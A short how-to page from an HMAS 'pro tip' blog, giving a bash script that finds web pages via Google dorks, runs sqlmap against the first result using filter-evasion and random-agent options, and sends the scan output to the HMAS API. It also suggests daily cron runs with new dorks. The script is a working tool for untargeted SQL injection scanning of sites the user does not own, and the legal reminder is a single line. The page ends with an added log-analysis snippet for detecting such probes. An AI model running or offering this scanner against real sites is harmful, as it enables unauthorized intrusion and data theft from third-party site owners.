HMAS Pro Tip
May 21, 2025 • 477 words
Dork-Based SQL Injection Recon with sqlmap + HMAS
Ready to go full hacker-mode with style? This guide shows how to combine Google dorking,
automated SQL injection testing using sqlmap, and the HMAS send= or share= feature for stylized,
secure reporting, without exceeding API limits.
What This Script Does
- Uses a Google dork to discover vulnerable URLs.
- Runs sqlmap against those URLs.
- Compresses the output into a single message.
- Sends the report using send= (encrypted) or share= (via email).
Script: sqlmap_dork_report.sh
#!/bin/bash
# this script assumes you are using sqlmap.py
# if not please update the url
# === CONFIGURATION ===
API_KEY="your_api_key"
RECIPIENT_KEY="admin_api_key"
API_URL="https://carlostkd.ch/hmas/api.php"
USE_EMAIL=0 # set to 1 to send email
EMAIL_RECIPIENT="pentest@example.com"
DORK="$1"
# Path to local sqlmap.py fallback
LOCAL_SQLMAP="/path/to/sqlmap/sqlmap.py"
if [ -z "$DORK" ]; then
echo "Usage: $0 \"inurl:page.php?id= site:com\""
exit 1
fi
# === DETERMINE SQLMAP COMMAND ===
if command -v sqlmap &>/dev/null; then
SQLMAP_CMD="sqlmap"
elif [ -f "$LOCAL_SQLMAP" ]; then
SQLMAP_CMD="python3 $LOCAL_SQLMAP"
else
echo "[!] sqlmap not found. Please install it or set LOCAL_SQLMAP correctly."
exit 1
fi
echo "[*] Searching for target URL from dork: $DORK"
RAW_OUTPUT=$($SQLMAP_CMD -g "$DORK" --dbs --tamper=space2comment --random-agent --batch --flush-session --disable-coloring -v 0 2>/dev/null)
# === EXTRACT URL ===
FOUND_URL=$(echo "$RAW_OUTPUT" | grep -Eo 'http[s]?://[^ ]+' | head -n 1)
if [ -z "$FOUND_URL" ]; then
echo "[!] No valid target URL found from dork. Aborting."
exit 1
fi
echo "[+] Found URL: $FOUND_URL"
TMPFILE=$(mktemp)
# === RUN SQLMAP SCAN ===
echo "[*] Running sqlmap scan on: $FOUND_URL"
$SQLMAP_CMD -u "$FOUND_URL" --dbs --tamper=space2comment --random-agent --batch --level=2 --risk=1 --flush-session --disable-coloring > "$TMPFILE" 2>&1
wait
# === READ OUTPUT ===
if [ ! -s "$TMPFILE" ]; then
echo "[!] No output captured from sqlmap."
rm -f "$TMPFILE"
exit 1
fi
SCAN_OUTPUT=$(tail -n 40 "$TMPFILE")
rm -f "$TMPFILE"
# === BUILD AND ENCODE MESSAGE ===
HOST=$(hostname)
TIME=$(date)
MESSAGE="SQLi Recon Report\n\nDork: $DORK\nTarget: $FOUND_URL\nHost: $HOST\nTime: $TIME\n\nSummary:\n$SCAN_OUTPUT"
ENCODED_MSG=$(echo -e "$MESSAGE" | jq -sRr @uri)
# === SEND TO API ===
if [ "$USE_EMAIL" -eq 1 ]; then
curl -G "$API_URL" \
--data-urlencode "share=$EMAIL_RECIPIENT" \
--data-urlencode "msg=SQLi_Report" \
--data-urlencode "apikey=$API_KEY"
else
curl -G "$API_URL" \
--data-urlencode "send=$ENCODED_MSG" \
--data-urlencode "rec=$RECIPIENT_KEY" \
--data-urlencode "selfdestruct=1" \
--data-urlencode "apikey=$API_KEY"
fi
Example Use
./sqlmap_dork_report.sh "inurl:post.php?id= site:com"
- Finds URLs using Google dorking
- Tests them for SQLi
- Sends results securely via your API
Hacker Tips
- Use selfdestruct=1 to nuke the message after reading.
- Auto-run in cron with different dorks daily.
- Include chatstyle=panic or diffmode=corrupt for max drama.
Legal Reminder
Only test systems you own or have explicit permission to test.
This isn't Hollywood: it's real and traceable.
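What "traceable" looks like on the receiving end, as an added example that is not part of the original page or the HMAS project: --tamper=space2comment rewrites every space in a payload as /**/, so the requests stand out in an access log even though --random-agent hides sqlmap's default User-Agent. The function names are hypothetical, the log is assumed to be in combined log format, and the sample lines are constructed.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = '''\
203.0.113.7 - - [21/May/2025:10:00:01 +0000] "GET /post.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [21/May/2025:10:00:02 +0000] "GET /post.php?id=1%2F%2A%2A%2FAND%2F%2A%2A%2F4512%3D4512 HTTP/1.1" 200 512 "-" "Opera/9.80 (Windows NT 6.1)"
203.0.113.7 - - [21/May/2025:10:00:03 +0000] "GET /post.php?id=1/**/UNION/**/ALL/**/SELECT/**/NULL,NULL HTTP/1.1" 500 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0)"
198.51.100.9 - - [21/May/2025:10:00:04 +0000] "GET /static/app.js?v=2 HTTP/1.1" 200 900 "-" "Mozilla/5.0 (Macintosh)"
198.51.100.9 - - [21/May/2025:10:00:05 +0000] "GET /search?q=select+a+plan HTTP/1.1" 200 900 "-" "Mozilla/5.0 (Macintosh)"
'''

# client IP, request target and status code from a combined-format line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
# SQL keywords that boolean, UNION and time-based injection checks rely on
SQL_KW_RE = re.compile(
    r"\b(and|or|union|select|from|where|sleep|benchmark|waitfor)\b", re.I)
# space2comment replaces each space in the payload with an empty inline comment
COMMENT_AS_SPACE = "/**/"


def find_probes(log_text):
    """Return (ip, path, decoded_query, status) for space2comment-shaped requests."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, target, status = m.groups()
        parts = urlsplit(target)
        query = unquote_plus(parts.query)  # %2F%2A%2A%2F decodes to /**/
        # Require both signals: a bare SQL word in a search box is not enough.
        if COMMENT_AS_SPACE in query and SQL_KW_RE.search(query):
            hits.append((ip, parts.path, query, int(status)))
    return hits


def probes_per_source(hits):
    """Count flagged requests per client IP, the unit to rate-limit or block."""
    return Counter(ip for ip, _, _, _ in hits)


if __name__ == "__main__":
    for ip, path, query, status in find_probes(SAMPLE_LOG):
        print(f"{ip} {status} {path}?{query}")
```

The match keys on payload shape rather than User-Agent, so it still fires when the client presents a browser-like agent string.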
Created by HMAS Team
Happy hunting, elite dorklord